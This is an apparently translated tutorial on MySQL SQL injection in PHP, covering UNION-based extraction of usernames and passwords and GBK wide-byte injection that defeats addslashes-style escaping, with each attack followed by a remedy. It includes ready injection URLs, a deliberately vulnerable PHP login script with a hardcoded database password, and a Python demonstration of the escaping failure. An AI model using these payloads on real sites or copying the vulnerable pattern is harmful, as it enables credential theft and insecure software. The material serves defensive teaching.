I. Single-byte SQL injection
MySQL SQL injection has been around for a long time. The usual injection steps are:
1. Append /* or # to the GET parameter to determine whether the database is MySQL. For example:
http://www.xxx.com.cn/article.php?id=1607 and 1=1 /*
2. Guess the number of columns in the table. Start with order by 1 and keep increasing the number until the page errors; the last value that still works is the column count.
Injection URL: http://www.xxx.com.cn/article.php?id=1607 or 1=1 order by 10 #
Corresponding SQL: select * from articles where id = 1607 or 1 = 1 order by 10 #....
3. Join this query to the user table with UNION so that user names and passwords are displayed in the article list. This requires guessing the user table's name and its username and password column names (and the UNION must select the same number of columns as the original query). For example, if the number of columns found in the previous step is 5:
Injection URL: http://www.xxx.com.cn/article.php?id=1607 or 1=1 union select username, password, 3 from user
Corresponding SQL: select * from articles where id = 1607 or 1 = 1 union select username, password, 3 from user
The user name and password then appear in the page.
Solution:
Filter data: this is not an empty platitude. Careful data filtering in the right places removes most of the risk and eliminates some of it entirely.
Quote data: if your database allows it (MySQL does), wrap every value in single quotation marks, whatever its type.
Escape data: some legitimate data may accidentally break the SQL statement's syntax. Use mysql_escape_string() or the escaping function your database provides; if none is provided, addslashes() is an acceptable last resort.
II. Wide-byte injection
Wide-byte injection is another problem found in recent projects. We all know that when PHP escapes %df (through magic_quotes_gpc, addslashes(), or iconv), a backslash is added before a single quote, so ' becomes \', and \ is %5c in hex. Thus %df' becomes %df%5c%27. If the program's default character set is GBK, a multi-byte (wide-byte) character set, then when MySQL interprets the bytes as GBK it treats %df%5c as a single wide character, namely 運. That is, %df' = %df%5c%27 = 運', and with the single quote no longer escaped, injection is easy. For example:
<?php
$conn = mysql_connect("localhost", "root", "2sdfxedd");
mysql_query("set names 'gbk'");              // GBK connection charset: this is what makes the escaping bypassable
mysql_select_db("test", $conn);
$user = mysql_escape_string($_GET['user']);  // escapes ' to \' without knowing the connection charset
$pass = mysql_escape_string($_GET['pass']);
$sql = "select * from cms_user where username = '$user' and password = '$pass'";
$result = mysql_query($sql, $conn);
$rows = array();
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    $rows[] = $row;
}
?>
Send the following injection:
http://www.xxx.com/login.php?user=%df'%20or%201=1%20limit%201,1%23&pass=
The corresponding SQL statement is:
select * from cms_user where username = '運' or 1 = 1 limit 1,1 #' and password = ''
Solution: after the connection is opened and the character set is initialized, run SET character_set_client = binary so that the client character set is binary. For example:
mysql_query("SET character_set_client = binary");
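The following is an added demonstration, not code from the original article, of why byte-wise escaping fails under a GBK connection charset and why parsing the query byte by byte (the effect of SET character_set_client = binary) fixes it. It reimplements the escaping of addslashes()/mysql_escape_string() and a minimal MySQL-style literal scanner; the payload is constructed as the URL-decoded form of the article's request, and decoding as 'latin-1' is used only as a stand-in for the binary client charset.

```python
ESCAPED = b"'\"\\\x00"  # bytes that addslashes()/mysql_escape_string() prefix with 0x5C

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping: it knows nothing about the connection charset."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def build_query(user: bytes, password: bytes) -> bytes:
    """The article's login query, concatenated the way the vulnerable PHP does."""
    return (b"select * from cms_user where username = '" + addslashes(user)
            + b"' and password = '" + addslashes(password) + b"'")

def split_literals(sql: str):
    """Minimal MySQL-style scan: (bodies of '...' literals, text outside them).
    Backslash escapes the next char inside a literal; '#' outside one ends parsing."""
    literals, outside, cur, i = [], [], None, 0
    while i < len(sql):
        c = sql[i]
        if cur is None:
            if c == "'":
                cur = []
            elif c == "#":
                break  # rest of the line is a comment
            else:
                outside.append(c)
        elif c == "\\" and i + 1 < len(sql):
            cur.append(sql[i + 1]); i += 1  # escaped char stays in the literal
        elif c == "'":
            literals.append("".join(cur)); cur = None
        else:
            cur.append(c)
        i += 1
    if cur is not None:
        literals.append("".join(cur))
    return literals, "".join(outside)

def server_view(user: bytes, charset: str):
    """How the server parses the query: 'gbk' models SET NAMES 'gbk'; 'latin-1'
    stands in for character_set_client = binary (one byte = one char, 0x5C is always a backslash)."""
    return split_literals(build_query(user, b"").decode(charset, errors="replace"))

# Constructed payload: URL-decoded form of the article's %df'%20or%201=1%20limit%201,1%23
PAYLOAD = b"\xdf' or 1=1 limit 1,1 #"
```

Under 'gbk' the bytes 0xDF 0x5C collapse into one character, the quote closes the literal early and `or 1=1 limit 1,1` lands outside it; under the byte-wise view the backslash still escapes the quote and the whole payload stays inside the username literal.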